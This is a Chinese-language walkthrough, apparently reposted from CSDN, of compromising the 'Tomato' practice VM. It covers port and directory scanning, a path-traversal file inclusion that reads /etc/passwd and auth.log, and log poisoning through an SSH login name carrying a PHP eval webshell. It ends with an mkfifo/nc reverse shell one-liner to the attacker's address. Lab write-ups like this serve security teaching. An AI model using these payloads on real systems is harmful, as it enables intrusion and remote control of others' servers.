欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 新闻 > 会展 > Tomato靶机~文件包含日志

Tomato靶机~文件包含日志

2025/9/26 12:25:25 来源:https://blog.csdn.net/weixin_67832625/article/details/140876352  浏览:    关键词:Tomato靶机~文件包含日志

在这里插入图片描述
寻找网站上传点并把 php 恶意代码文件改成 jpg 上传到网站上在本地包含引入恶意代码,当文件被引入后代码就被执行;

0x01信息收集

# 环境准备:
Target IP:192.168.66.143
Attack IP:192.168.66.84
靶机目标:Tomato
// 这里需要注意靶机本身环境是桥接模式,我们需要给它换成NAT模式
# 扫描网段
arp-sacn -l

image-20240802162229327

# 对靶机192.168.66.143端口扫描
nmap 192.168.66.143

image-20240802162452483

# 目录扫描
dirsearch -u "http://192.168.66.143"
dirb "http://192.168.66.143"

image-20240802163231021

image-20240802163526548

0x02漏洞发现

image-20240802163658983

发现有文件上传的漏洞

image-20240802164425778

# 由于是linux系统,我们尝试看一下passwd文件
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd

image-20240802164733628

# 我们再看一下它的日志
http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

image-20240802165056349

0x03反弹shell

# 我们尝试写一句话木马 ,进行反弹
ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.66.143

image-20240802170251857

# 使用中国蚁剑连接

image-20240802170208101

# 连接终端

image-20240802170752470

# 在kali上开个监听
nc -lvvp 9999 

image-20240802171501796

# 反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 9999 >/tmp/f
// IP是攻击机的

image-20240802171608709

好小子,离成功又近一步!!!

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词